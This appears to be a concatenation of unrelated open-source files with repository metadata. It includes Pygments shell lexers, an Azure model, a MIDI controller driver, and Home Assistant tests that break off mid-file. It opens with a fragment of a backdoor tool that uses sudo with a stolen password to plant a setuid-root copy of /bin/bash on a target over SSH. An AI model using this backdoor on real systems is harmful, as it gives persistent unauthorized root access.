return "echo " + self.core.curtarget.pword + " | sudo -S cp /bin/bash " + self.get_value("name") + " && echo " + self.core.curtarget.pword + " | sudo -S chmod 4755 " + self.get_value("name")
def do_exploit(self, args):
target = self.core.curtarget
print(GOOD + "Initializing backdoor...")
target.ssh.exec_command(self.get_command())
print(GOOD + "Shell Backdoor attempted.")
for mod in self.modules.keys():
print(INFO + "Attempting to execute " + mod.name + " module...")
mod.exploit()
|
sovaa/backdoorme
|
backdoors/escalation/shell.py
|
Python
|
mit
| 1,569
|
# -*- coding: utf-8 -*-
# The MIT License (MIT) - Copyright (c) 2016-2021 Dave Vandenbout.
import pytest
from skidl import Net, Pin
from .setup_teardown import setup_function, teardown_function
def test_net_merge_1():
a = Net("A")
b = Net("B")
a += 5 * Pin()
assert len(a) == 5
b += Pin(), Pin(), Pin()
assert len(b) == 3
a += b
assert len(a) == 8
|
xesscorp/skidl
|
tests/test_merge.py
|
Python
|
mit
| 386
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class KeyCredential(Model):
"""Active Directory Key Credential information.
:param start_date: Start date.
:type start_date: datetime
:param end_date: End date.
:type end_date: datetime
:param value: Key value.
:type value: str
:param key_id: Key ID.
:type key_id: str
:param usage: Usage. Acceptable values are 'Verify' and 'Sign'.
:type usage: str
:param type: Type. Acceptable values are 'AsymmetricX509Cert' and
'Symmetric'.
:type type: str
"""
_attribute_map = {
'start_date': {'key': 'startDate', 'type': 'iso-8601'},
'end_date': {'key': 'endDate', 'type': 'iso-8601'},
'value': {'key': 'value', 'type': 'str'},
'key_id': {'key': 'keyId', 'type': 'str'},
'usage': {'key': 'usage', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(self, start_date=None, end_date=None, value=None, key_id=None, usage=None, type=None):
self.start_date = start_date
self.end_date = end_date
self.value = value
self.key_id = key_id
self.usage = usage
self.type = type
|
v-iam/azure-sdk-for-python
|
azure-graphrbac/azure/graphrbac/models/key_credential.py
|
Python
|
mit
| 1,662
|
# -*- coding: utf-8 -*-
"""
pygments.lexers.shell
~~~~~~~~~~~~~~~~~~~~~
Lexers for various shells.
:copyright: Copyright 2006-2015 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
from pygments.lexer import Lexer, RegexLexer, do_insertions, bygroups, include
from pygments.token import Punctuation, \
Text, Comment, Operator, Keyword, Name, String, Number, Generic
from pygments.util import shebang_matches
__all__ = ['BashLexer', 'BashSessionLexer', 'TcshLexer', 'BatchLexer',
'PowerShellLexer', 'ShellSessionLexer']
line_re = re.compile('.*?\n')
class BashLexer(RegexLexer):
"""
Lexer for (ba|k|)sh shell scripts.
.. versionadded:: 0.6
"""
name = 'Bash'
aliases = ['bash', 'sh', 'ksh', 'shell']
filenames = ['*.sh', '*.ksh', '*.bash', '*.ebuild', '*.eclass',
'.bashrc', 'bashrc', '.bash_*', 'bash_*', 'PKGBUILD']
mimetypes = ['application/x-sh', 'application/x-shellscript']
tokens = {
'root': [
include('basic'),
(r'`', String.Backtick, 'backticks'),
include('data'),
include('interp'),
],
'interp': [
(r'\$\(\(', Keyword, 'math'),
(r'\$\(', Keyword, 'paren'),
(r'\$\{#?', String.Interpol, 'curly'),
(r'\$#?(\w+|.)', Name.Variable),
],
'basic': [
(r'\b(if|fi|else|while|do|done|for|then|return|function|case|'
r'select|continue|until|esac|elif)(\s*)\b',
bygroups(Keyword, Text)),
(r'\b(alias|bg|bind|break|builtin|caller|cd|command|compgen|'
r'complete|declare|dirs|disown|echo|enable|eval|exec|exit|'
r'export|false|fc|fg|getopts|hash|help|history|jobs|kill|let|'
r'local|logout|popd|printf|pushd|pwd|read|readonly|set|shift|'
r'shopt|source|suspend|test|time|times|trap|true|type|typeset|'
r'ulimit|umask|unalias|unset|wait)\s*\b(?!\.)',
Name.Builtin),
(r'#.*\n', Comment),
(r'\\[\w\W]', String.Escape),
(r'(\b\w+)(\s*)(=)', bygroups(Name.Variable, Text, Operator)),
(r'[\[\]{}()=]', Operator),
(r'<<<', Operator), # here-string
(r'<<-?\s*(\'?)\\?(\w+)[\w\W]+?\2', String),
(r'&&|\|\|', Operator),
],
'data': [
(r'(?s)\$?"(\\\\|\\[0-7]+|\\.|[^"\\$])*"', String.Double),
(r'"', String.Double, 'string'),
(r"(?s)\$'(\\\\|\\[0-7]+|\\.|[^'\\])*'", String.Single),
(r"(?s)'.*?'", String.Single),
(r';', Punctuation),
(r'&', Punctuation),
(r'\|', Punctuation),
(r'\s+', Text),
(r'\d+(?= |\Z)', Number),
(r'[^=\s\[\]{}()$"\'`\\<&|;]+', Text),
(r'<', Text),
],
'string': [
(r'"', String.Double, '#pop'),
(r'(?s)(\\\\|\\[0-7]+|\\.|[^"\\$])+', String.Double),
include('interp'),
],
'curly': [
(r'\}', String.Interpol, '#pop'),
(r':-', Keyword),
(r'\w+', Name.Variable),
(r'[^}:"\'`$\\]+', Punctuation),
(r':', Punctuation),
include('root'),
],
'paren': [
(r'\)', Keyword, '#pop'),
include('root'),
],
'math': [
(r'\)\)', Keyword, '#pop'),
(r'[-+*/%^|&]|\*\*|\|\|', Operator),
(r'\d+#\d+', Number),
(r'\d+#(?! )', Number),
(r'\d+', Number),
include('root'),
],
'backticks': [
(r'`', String.Backtick, '#pop'),
include('root'),
],
}
def analyse_text(text):
if shebang_matches(text, r'(ba|z|)sh'):
return 1
if text.startswith('$ '):
return 0.2
class BashSessionLexer(Lexer):
"""
Lexer for simplistic shell sessions.
.. versionadded:: 1.1
"""
name = 'Bash Session'
aliases = ['console']
filenames = ['*.sh-session']
mimetypes = ['application/x-shell-session']
def get_tokens_unprocessed(self, text):
bashlexer = BashLexer(**self.options)
pos = 0
curcode = ''
insertions = []
for match in line_re.finditer(text):
line = match.group()
m = re.match(r'^((?:\(\S+\))?(?:|sh\S*?|\w+\S+[@:]\S+(?:\s+\S+)'
r'?|\[\S+[@:][^\n]+\].+)[$#%])(.*\n?)' , line)
if m:
# To support output lexers (say diff output), the output
# needs to be broken by prompts whenever the output lexer
# changes.
if not insertions:
pos = match.start()
insertions.append((len(curcode),
[(0, Generic.Prompt, m.group(1))]))
curcode += m.group(2)
elif line.startswith('>'):
insertions.append((len(curcode),
[(0, Generic.Prompt, line[:1])]))
curcode += line[1:]
else:
if insertions:
toks = bashlexer.get_tokens_unprocessed(curcode)
for i, t, v in do_insertions(insertions, toks):
yield pos+i, t, v
yield match.start(), Generic.Output, line
insertions = []
curcode = ''
if insertions:
for i, t, v in do_insertions(insertions,
bashlexer.get_tokens_unprocessed(curcode)):
yield pos+i, t, v
class ShellSessionLexer(Lexer):
"""
Lexer for shell sessions that works with different command prompts
.. versionadded:: 1.6
"""
name = 'Shell Session'
aliases = ['shell-session']
filenames = ['*.shell-session']
mimetypes = ['application/x-sh-session']
def get_tokens_unprocessed(self, text):
bashlexer = BashLexer(**self.options)
pos = 0
curcode = ''
insertions = []
for match in line_re.finditer(text):
line = match.group()
m = re.match(r'^((?:\[?\S+@[^$#%]+\]?\s*)[$#%])(.*\n?)', line)
if m:
# To support output lexers (say diff output), the output
# needs to be broken by prompts whenever the output lexer
# changes.
if not insertions:
pos = match.start()
insertions.append((len(curcode),
[(0, Generic.Prompt, m.group(1))]))
curcode += m.group(2)
else:
if insertions:
toks = bashlexer.get_tokens_unprocessed(curcode)
for i, t, v in do_insertions(insertions, toks):
yield pos+i, t, v
yield match.start(), Generic.Output, line
insertions = []
curcode = ''
if insertions:
for i, t, v in do_insertions(insertions,
bashlexer.get_tokens_unprocessed(curcode)):
yield pos+i, t, v
class BatchLexer(RegexLexer):
"""
Lexer for the DOS/Windows Batch file format.
.. versionadded:: 0.7
"""
name = 'Batchfile'
aliases = ['bat', 'batch', 'dosbatch', 'winbatch']
filenames = ['*.bat', '*.cmd']
mimetypes = ['application/x-dos-batch']
flags = re.MULTILINE | re.IGNORECASE
tokens = {
'root': [
# Lines can start with @ to prevent echo
(r'^\s*@', Punctuation),
(r'^(\s*)(rem\s.*)$', bygroups(Text, Comment)),
(r'".*?"', String.Double),
(r"'.*?'", String.Single),
# If made more specific, make sure you still allow expansions
# like %~$VAR:zlt
(r'%%?[~$:\w]+%?', Name.Variable),
(r'::.*', Comment), # Technically :: only works at BOL
(r'\b(set)(\s+)(\w+)', bygroups(Keyword, Text, Name.Variable)),
(r'\b(call)(\s+)(:\w+)', bygroups(Keyword, Text, Name.Label)),
(r'\b(goto)(\s+)(\w+)', bygroups(Keyword, Text, Name.Label)),
(r'\b(set|call|echo|on|off|endlocal|for|do|goto|if|pause|'
r'setlocal|shift|errorlevel|exist|defined|cmdextversion|'
r'errorlevel|else|cd|md|del|deltree|cls|choice)\b', Keyword),
(r'\b(equ|neq|lss|leq|gtr|geq)\b', Operator),
include('basic'),
(r'.', Text),
],
'echo': [
# Escapes only valid within echo args?
(r'\^\^|\^<|\^>|\^\|', String.Escape),
(r'\n', Text, '#pop'),
include('basic'),
(r'[^\'"^]+', Text),
],
'basic': [
(r'".*?"', String.Double),
(r"'.*?'", String.Single),
(r'`.*?`', String.Backtick),
(r'-?\d+', Number),
(r',', Punctuation),
(r'=', Operator),
(r'/\S+', Name),
(r':\w+', Name.Label),
(r'\w:\w+', Text),
(r'([<>|])(\s*)(\w+)', bygroups(Punctuation, Text, Name)),
],
}
class TcshLexer(RegexLexer):
"""
Lexer for tcsh scripts.
.. versionadded:: 0.10
"""
name = 'Tcsh'
aliases = ['tcsh', 'csh']
filenames = ['*.tcsh', '*.csh']
mimetypes = ['application/x-csh']
tokens = {
'root': [
include('basic'),
(r'\$\(', Keyword, 'paren'),
(r'\$\{#?', Keyword, 'curly'),
(r'`', String.Backtick, 'backticks'),
include('data'),
],
'basic': [
(r'\b(if|endif|else|while|then|foreach|case|default|'
r'continue|goto|breaksw|end|switch|endsw)\s*\b',
Keyword),
(r'\b(alias|alloc|bg|bindkey|break|builtins|bye|caller|cd|chdir|'
r'complete|dirs|echo|echotc|eval|exec|exit|fg|filetest|getxvers|'
r'glob|getspath|hashstat|history|hup|inlib|jobs|kill|'
r'limit|log|login|logout|ls-F|migrate|newgrp|nice|nohup|notify|'
r'onintr|popd|printenv|pushd|rehash|repeat|rootnode|popd|pushd|'
r'set|shift|sched|setenv|setpath|settc|setty|setxvers|shift|'
r'source|stop|suspend|source|suspend|telltc|time|'
r'umask|unalias|uncomplete|unhash|universe|unlimit|unset|unsetenv|'
r'ver|wait|warp|watchlog|where|which)\s*\b',
Name.Builtin),
(r'#.*', Comment),
(r'\\[\w\W]', String.Escape),
(r'(\b\w+)(\s*)(=)', bygroups(Name.Variable, Text, Operator)),
(r'[\[\]{}()=]+', Operator),
(r'<<\s*(\'?)\\?(\w+)[\w\W]+?\2', String),
(r';', Punctuation),
],
'data': [
(r'(?s)"(\\\\|\\[0-7]+|\\.|[^"\\])*"', String.Double),
(r"(?s)'(\\\\|\\[0-7]+|\\.|[^'\\])*'", String.Single),
(r'\s+', Text),
(r'[^=\s\[\]{}()$"\'`\\;#]+', Text),
(r'\d+(?= |\Z)', Number),
(r'\$#?(\w+|.)', Name.Variable),
],
'curly': [
(r'\}', Keyword, '#pop'),
(r':-', Keyword),
(r'\w+', Name.Variable),
(r'[^}:"\'`$]+', Punctuation),
(r':', Punctuation),
include('root'),
],
'paren': [
(r'\)', Keyword, '#pop'),
include('root'),
],
'backticks': [
(r'`', String.Backtick, '#pop'),
include('root'),
],
}
class PowerShellLexer(RegexLexer):
"""
For Windows PowerShell code.
.. versionadded:: 1.5
"""
name = 'PowerShell'
aliases = ['powershell', 'posh', 'ps1', 'psm1']
filenames = ['*.ps1','*.psm1']
mimetypes = ['text/x-powershell']
flags = re.DOTALL | re.IGNORECASE | re.MULTILINE
keywords = (
'while validateset validaterange validatepattern validatelength '
'validatecount until trap switch return ref process param parameter in '
'if global: function foreach for finally filter end elseif else '
'dynamicparam do default continue cmdletbinding break begin alias \\? '
'% #script #private #local #global mandatory parametersetname position '
'valuefrompipeline valuefrompipelinebypropertyname '
'valuefromremainingarguments helpmessage try catch throw').split()
operators = (
'and as band bnot bor bxor casesensitive ccontains ceq cge cgt cle '
'clike clt cmatch cne cnotcontains cnotlike cnotmatch contains '
'creplace eq exact f file ge gt icontains ieq ige igt ile ilike ilt '
'imatch ine inotcontains inotlike inotmatch ireplace is isnot le like '
'lt match ne not notcontains notlike notmatch or regex replace '
'wildcard').split()
verbs = (
'write where wait use update unregister undo trace test tee take '
'suspend stop start split sort skip show set send select scroll resume '
'restore restart resolve resize reset rename remove register receive '
'read push pop ping out new move measure limit join invoke import '
'group get format foreach export expand exit enter enable disconnect '
'disable debug cxnew copy convertto convertfrom convert connect '
'complete compare clear checkpoint aggregate add').split()
commenthelp = (
'component description example externalhelp forwardhelpcategory '
'forwardhelptargetname functionality inputs link '
'notes outputs parameter remotehelprunspace role synopsis').split()
tokens = {
'root': [
# we need to count pairs of parentheses for correct highlight
# of '$(...)' blocks in strings
(r'\(', Punctuation, 'child'),
(r'\s+', Text),
(r'^(\s*#[#\s]*)(\.(?:%s))([^\n]*$)' % '|'.join(commenthelp),
bygroups(Comment, String.Doc, Comment)),
(r'#[^\n]*?$', Comment),
(r'(<|<)#', Comment.Multiline, 'multline'),
(r'@"\n', String.Heredoc, 'heredoc-double'),
(r"@'\n.*?\n'@", String.Heredoc),
# escaped syntax
(r'`[\'"$@-]', Punctuation),
(r'"', String.Double, 'string'),
(r"'([^']|'')*'", String.Single),
(r'(\$|@@|@)((global|script|private|env):)?\w+',
Name.Variable),
(r'(%s)\b' % '|'.join(keywords), Keyword),
(r'-(%s)\b' % '|'.join(operators), Operator),
(r'(%s)-[a-z_]\w*\b' % '|'.join(verbs), Name.Builtin),
(r'\[[a-z_\[][\w. `,\[\]]*\]', Name.Constant), # .net [type]s
(r'-[a-z_]\w*', Name),
(r'\w+', Name),
(r'[.,;@{}\[\]$()=+*/\\&%!~?^`|<>-]|::', Punctuation),
],
'child': [
(r'\)', Punctuation, '#pop'),
include('root'),
],
'multline': [
(r'[^#&.]+', Comment.Multiline),
(r'#(>|>)', Comment.Multiline, '#pop'),
(r'\.(%s)' % '|'.join(commenthelp), String.Doc),
(r'[#&.]', Comment.Multiline),
],
'string': [
(r"`[0abfnrtv'\"$`]", String.Escape),
(r'[^$`"]+', String.Double),
(r'\$\(', Punctuation, 'child'),
(r'""', String.Double),
(r'[`$]', String.Double),
(r'"', String.Double, '#pop'),
],
'heredoc-double': [
(r'\n"@', String.Heredoc, '#pop'),
(r'\$\(', Punctuation, 'child'),
(r'[^@\n]+"]', String.Heredoc),
(r".", String.Heredoc),
]
}
|
aeppert/diaphora
|
pygments/lexers/shell.py
|
Python
|
gpl-2.0
| 15,794
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Provide a class for storing project information.
Besides providing properties for storing data, the class also provides
packing, unpacking and other helper methods to provide basic manipulation
of projects (e.g. saving/loading from drive).
'''
import pickle
import os.path
import gobject
__author__ = "Mac Ryan"
__copyright__ = "Copyright 2011, Mac Ryan"
__license__ = "GPL v3"
__maintainer__ = "Mac Ryan"
__email__ = "quasipedia@gmail.com"
__status__ = "Development"
class Project(gobject.GObject):
'''
A project object stores all available information on a given project.
Normally used as singleton; it's a gobject.GObject child in order to be
able to be able to generate signals (see the bottom of this module).
'''
DEFAULT_EXTENSION = 'sav'
# Just to keep the door open for possible future non backward-
# compatible changes...
SCHEMA_VERSION = '1.0'
# All properties of the objects that need to be saved (and loaded)
SAVE_MASK = ['SCHEMA_VERSION',
'project_settings',
'vclock_settings',
'electronics_settings',
'supersequence']
# Project settings grouping
PRJ_STTNGS_PHRASES = ('clock', 'resolution', 'approx_method')
def __init__(self):
self.__gobject_init__()
self.__reset_project()
self.unsaved_flag = False
def __reset_project(self):
'''
Reset all those properties of the object that are project-specific.
'''
for property in self.SAVE_MASK:
if property != 'SCHEMA_VERSION': # don't overwrite class property!
setattr(self, property, None)
self.saved_state = self.__get_masked_dict()
self.last_save_fname = None
self.unsaved_flag = False
def __get_masked_dict(self):
'''
Returns a dictionary with the properties indicated in "SAVE_MASK".
'''
dict_ = {}
for pr in self.SAVE_MASK:
dict_[pr] = getattr(self, pr)
return dict_
def broadcast_change(self, skip_flag_setting=False):
'''
Check current values of the properties in SAVE_MASK against their
values on last broadcast_change call. If the state is changed, it emits
the signal "project_updated" with a dictionary of the properties that
have changed as a parameter.
It also set the "unsaved_flag" to True, unless the parameter
'skip_flag_setting' is set to True (useful for when project is first
loaded).
Return True if the state of the project has changed.
'''
has_changed = False
new_state = self.__get_masked_dict()
if self.saved_state != new_state:
has_changed = True
if not skip_flag_setting:
self.unsaved_flag = True
data = {}
for pr in self.SAVE_MASK:
if self.saved_state[pr] != new_state[pr]:
data[pr] = new_state[pr]
self.saved_state = new_state
self.emit("project_updated", data)
return has_changed
def is_populated(self):
'''
Return True if the project is populated.
'''
for pr in self.SAVE_MASK:
if pr != 'SCHEMA_VERSION' and getattr(self, pr) != None:
return True
return False
def is_unsaved(self):
'''
Return True if the project has unsaved changes.
'''
return self.unsaved_flag
def get_project_name(self):
'''
Return a suitable project name for the project.
(Typically used in the main window title
'''
if not self.is_populated():
return None
if self.last_save_fname == None:
name = '<new project>'
else:
name = os.path.split(self.last_save_fname)[1]
return name
def save(self, fname=None):
'''
Save to disk the essential data on the project. If fname is not given,
uses the name used on the last save operation.
'''
# If the file have not been given an extension, uses the default one
if fname and '.' not in os.path.split(fname)[1]:
fname += '.' + self.DEFAULT_EXTENSION
# Automatic save (no file name selection)
if fname == None:
assert self.last_save_fname != None
fname = self.last_save_fname
prj = dict()
for property in self.SAVE_MASK:
prj[property] = getattr(self, property)
try:
file_ = open(fname, 'w')
except:
problem_description = '''It was <b>impossible to open the requested
file</b>. Hint: are you sure the saved file has the right
permissions for <i>Chasy</i> to open it?'''
self.emit("disk_operation_problem", problem_description)
return -1
# Protocol 0 (default one *will* generate problems with cyclic
# reference of sequence and elements.
pickle.dump(prj, file_, pickle.HIGHEST_PROTOCOL)
file_.close()
self.last_save_fname = fname
self.unsaved_flag = False
# Need to call this to update main window title
self.emit("project_updated", None)
def load(self, fname, installed_modules):
'''
Load a project from disk and regenerate the environment to match it.
'installed_modules' is a list of the installed clock modules on the
system. Trying to load a project based on an uninstalled module will
generate a non fatal error.
'''
self.__reset_project()
try:
file_ = open(fname, 'r')
except:
problem_description = '''It was <b>impossible to open the requested
file</b>. Hint: are you sure the saved file has the right
permissions for <i>Chasy</i> to open it?'''
self.emit("disk_operation_problem", problem_description)
return -1
try:
prj = pickle.load(file_)
except:
problem_description = '''Although it was possible to open the
project file, it was <b>impossible to decode the data</b> in
it. Hint: are you sure the saved file is a <i>Chasy</i>
project?'''
self.emit("disk_operation_problem", problem_description)
return -1
file_.close()
# Schema version compatibility check (mostly for future!)
if prj['SCHEMA_VERSION'] != self.SCHEMA_VERSION:
problem_description = '''The project is saved with a <b>schema
version</b> (%s) which is incompatible with the one of the
version of <i>Chasy</i> in use on this system.''' % \
prj['SCHEMA_VERSION']
self.emit("disk_operation_problem", problem_description)
return -1
del prj['SCHEMA_VERSION']
# Verify required module is installed
required = prj['project_settings']['clock']
if required not in installed_modules:
problem_description = '''The saved project is based the <b>"%s"
clock module</b>, which is not installed on the system in use.
''' % required
self.emit("disk_operation_problem", problem_description)
return -1
for property in prj:
setattr(self, property, prj[property])
self.last_save_fname = fname
self.unsaved_flag = False
self.broadcast_change(skip_flag_setting=True)
def close(self):
'''
Close the current project.
Note that the parameter for the signal is "None" and is a special case
that each handler must process correctly.
'''
self.__reset_project()
self.emit("project_updated", None)
# These lines register specific signals into the GObject framework.
gobject.type_register(Project)
gobject.signal_new("project_updated", Project, gobject.SIGNAL_RUN_FIRST,
gobject.TYPE_NONE, (gobject.TYPE_PYOBJECT,))
gobject.signal_new("disk_operation_problem", Project, gobject.SIGNAL_RUN_FIRST,
gobject.TYPE_NONE, (gobject.TYPE_PYOBJECT,))
def run_as_script():
'''Run this code if the file is executed as script.'''
print('Module executed as script!')
if __name__ == '__main__':
run_as_script()
|
quasipedia/Chasy
|
src/models/project.py
|
Python
|
gpl-3.0
| 8,489
|
#!/usr/bin/env python2
# coding: utf-8
'''Code to talk to the softstep foot controller.
Copyright 2014, Matthieu Amiguet
The midi sniffing has been done by Tom Swirly.
https://github.com/rec/swirly/blob/master/js/swirly/softstep/enable.js
This file is part of FooCoCo.
FooCoCo is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
from pygame import midi
import sysex
# CONSTANTS
GREEN = 0
RED = 1
YELLOW = 2
OFF = 0
ON = 1
BLINK = 2
FAST_BLINK = 3
FLASH = 4
# Private functions
def _open_device(name='SSCOM MIDI 1', device_index=1):
'''Opens midi device with given name and port number'''
# This code stinks. Is there any better way to find the device?
for dn in range(midi.get_count()):
md = midi.get_device_info(dn)
if (md[1] == name) and (md[3] == 1): # md[3] == 1 <=> output device
device_index -= 1
if device_index == 0:
return midi.Output(dn)
raise RuntimeError("Could not find a SoftStep Controller")
def _standalone(b):
'''True for going standalone, False for so-called "tethered" mode'''
# It seems to me that Tom's names for sysex messages are reversed,
# but this seems to work
standalone = 0 if b else 1
softstep.write_sys_ex(0, sysex.messages['standalone'][standalone])
softstep.write_sys_ex(0, sysex.messages['tether'][1-standalone])
# Public API
def init(text='HELO', device_index=1):
'''Finds and initializes the device'''
global softstep
midi.init()
softstep = _open_device('SSCOM MIDI 1', device_index)
_standalone(False)
display(text)
reset_leds()
def close(back_to_standalone_mode=True):
'''Closes the device and optionnaly returns to standalone mode'''
display('Bye')
reset_leds()
if back_to_standalone_mode:
_standalone(True)
# TODO: fix the 'PortMidi: Bad Pointer' error that occurs when closing the midi device
softstep.close()
def backlight(b):
'''True turns backlight on, False turns it off'''
val = 1 if b else 0
softstep.write_sys_ex(0, sysex.messages['backlight'][val])
def led(number, color, mode):
'''Sets led number <led> (numbered from 1 to 10) to given color and mode'''
softstep.write_short(0xB0,40,number-1) # select led, numbered from 0
softstep.write_short(0xB0,41,color) # green = 0, red = 1, yellow = 2
softstep.write_short(0xB0,42,mode) # range(x) = (off, on, blink, fast, flash)
softstep.write_short(0xB0,0,0)
softstep.write_short(0xB0,0,0)
softstep.write_short(0xB0,0,0)
def reset_leds():
'''Switch all leds off'''
for l in range(1,11):
for c in range(3):
led(l,c,0)
def display(text):
'''Sets the text on the device's display. The text gets truncated to 4 chars'''
# We want exctly 4 chars in the string
text = text[:4]
text = text + (' ' * (4-len(text)))
# Now send to the device
for n, c in enumerate(text):
softstep.write_short(176,50+n,ord(c))
if __name__ == '__main__':
# Direct use example
init()
backlight(False)
led(1,GREEN,ON)
led(2,RED,ON)
led(3,YELLOW,ON)
import time
time.sleep(2)
backlight(True)
display('Cool')
led(6,GREEN,BLINK)
led(7,RED,FAST_BLINK)
led(8,YELLOW,FLASH)
time.sleep(2)
backlight(False)
close()
|
amiguet/foococo
|
hardware.py
|
Python
|
gpl-3.0
| 3,998
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.utils.translation import ugettext_lazy as _
import horizon_lib
from openstack_horizon.api import nova
from openstack_horizon.dashboards.admin import dashboard
class Aggregates(horizon_lib.Panel):
name = _("Host Aggregates")
slug = 'aggregates'
permissions = ('openstack.services.compute',)
def can_access(self, context):
# extend basic permission-based check with a check to see whether
# the Aggregates extension is even enabled in nova
if not nova.extension_supported('Aggregates', context['request']):
return False
return super(Aggregates, self).can_access(context)
dashboard.Admin.register(Aggregates)
|
mrunge/openstack_horizon
|
openstack_horizon/dashboards/admin/aggregates/panel.py
|
Python
|
apache-2.0
| 1,258
|
"""The tests for the Netatmo climate platform."""
from unittest.mock import Mock, patch
from homeassistant.components.climate import (
DOMAIN as CLIMATE_DOMAIN,
SERVICE_SET_HVAC_MODE,
SERVICE_SET_PRESET_MODE,
SERVICE_SET_TEMPERATURE,
SERVICE_TURN_OFF,
SERVICE_TURN_ON,
)
from homeassistant.components.climate.const import (
ATTR_HVAC_MODE,
ATTR_PRESET_MODE,
HVAC_MODE_AUTO,
HVAC_MODE_HEAT,
HVAC_MODE_OFF,
PRESET_AWAY,
PRESET_BOOST,
)
from homeassistant.components.netatmo import climate
from homeassistant.components.netatmo.climate import PRESET_FROST_GUARD, PRESET_SCHEDULE
from homeassistant.components.netatmo.const import (
ATTR_SCHEDULE_NAME,
SERVICE_SET_SCHEDULE,
)
from homeassistant.const import ATTR_ENTITY_ID, ATTR_TEMPERATURE, CONF_WEBHOOK_ID
from .common import selected_platforms, simulate_webhook
async def test_webhook_event_handling_thermostats(hass, config_entry, netatmo_auth):
"""Test service and webhook event handling with thermostats."""
with selected_platforms(["climate"]):
await hass.config_entries.async_setup(config_entry.entry_id)
await hass.async_block_till_done()
webhook_id = config_entry.data[CONF_WEBHOOK_ID]
climate_entity_livingroom = "climate.netatmo_livingroom"
assert hass.states.get(climate_entity_livingroom).state == "auto"
assert (
hass.states.get(climate_entity_livingroom).attributes["preset_mode"]
== "Schedule"
)
assert hass.states.get(climate_entity_livingroom).attributes["temperature"] == 12
# Test service setting the temperature
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_TEMPERATURE,
{ATTR_ENTITY_ID: climate_entity_livingroom, ATTR_TEMPERATURE: 21},
blocking=True,
)
await hass.async_block_till_done()
# Fake webhook thermostat manual set point
response = {
"room_id": "2746182631",
"home": {
"id": "91763b24c43d3e344f424e8b",
"name": "MYHOME",
"country": "DE",
"rooms": [
{
"id": "2746182631",
"name": "Livingroom",
"type": "livingroom",
"therm_setpoint_mode": "manual",
"therm_setpoint_temperature": 21,
"therm_setpoint_end_time": 1612734552,
}
],
"modules": [
{"id": "12:34:56:00:01:ae", "name": "Livingroom", "type": "NATherm1"}
],
},
"mode": "manual",
"event_type": "set_point",
"temperature": 21,
"push_type": "display_change",
}
await simulate_webhook(hass, webhook_id, response)
assert hass.states.get(climate_entity_livingroom).state == "heat"
assert (
hass.states.get(climate_entity_livingroom).attributes["preset_mode"]
== "Schedule"
)
assert hass.states.get(climate_entity_livingroom).attributes["temperature"] == 21
# Test service setting the HVAC mode to "heat"
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_HVAC_MODE,
{ATTR_ENTITY_ID: climate_entity_livingroom, ATTR_HVAC_MODE: HVAC_MODE_HEAT},
blocking=True,
)
await hass.async_block_till_done()
# Fake webhook thermostat mode change to "Max"
response = {
"room_id": "2746182631",
"home": {
"id": "91763b24c43d3e344f424e8b",
"name": "MYHOME",
"country": "DE",
"rooms": [
{
"id": "2746182631",
"name": "Livingroom",
"type": "livingroom",
"therm_setpoint_mode": "max",
"therm_setpoint_end_time": 1612749189,
}
],
"modules": [
{"id": "12:34:56:00:01:ae", "name": "Livingroom", "type": "NATherm1"}
],
},
"mode": "max",
"event_type": "set_point",
"push_type": "display_change",
}
await simulate_webhook(hass, webhook_id, response)
assert hass.states.get(climate_entity_livingroom).state == "heat"
assert hass.states.get(climate_entity_livingroom).attributes["temperature"] == 30
# Test service setting the HVAC mode to "off"
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_HVAC_MODE,
{ATTR_ENTITY_ID: climate_entity_livingroom, ATTR_HVAC_MODE: HVAC_MODE_OFF},
blocking=True,
)
await hass.async_block_till_done()
# Fake webhook turn thermostat off
response = {
"home": {
"id": "91763b24c43d3e344f424e8b",
"name": "MYHOME",
"country": "DE",
"rooms": [
{
"id": "2746182631",
"name": "Livingroom",
"type": "livingroom",
"therm_setpoint_mode": "off",
}
],
"modules": [
{"id": "12:34:56:00:01:ae", "name": "Livingroom", "type": "NATherm1"}
],
},
"mode": "off",
"event_type": "set_point",
"push_type": "display_change",
}
await simulate_webhook(hass, webhook_id, response)
assert hass.states.get(climate_entity_livingroom).state == "off"
# Test service setting the HVAC mode to "auto"
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_HVAC_MODE,
{ATTR_ENTITY_ID: climate_entity_livingroom, ATTR_HVAC_MODE: HVAC_MODE_AUTO},
blocking=True,
)
await hass.async_block_till_done()
# Fake webhook thermostat mode cancel set point
response = {
"room_id": "2746182631",
"home": {
"id": "91763b24c43d3e344f424e8b",
"name": "MYHOME",
"country": "DE",
"rooms": [
{
"id": "2746182631",
"name": "Livingroom",
"type": "livingroom",
"therm_setpoint_mode": "home",
}
],
"modules": [
{"id": "12:34:56:00:01:ae", "name": "Livingroom", "type": "NATherm1"}
],
},
"mode": "home",
"event_type": "cancel_set_point",
"push_type": "display_change",
}
await simulate_webhook(hass, webhook_id, response)
assert hass.states.get(climate_entity_livingroom).state == "auto"
assert (
hass.states.get(climate_entity_livingroom).attributes["preset_mode"]
== "Schedule"
)
async def test_service_preset_mode_frost_guard_thermostat(
hass, config_entry, netatmo_auth
):
